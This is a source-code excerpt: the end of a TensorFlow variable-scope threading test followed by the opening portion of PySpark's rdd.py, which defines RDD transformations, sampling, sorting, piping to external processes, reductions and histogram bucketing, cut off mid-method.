self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
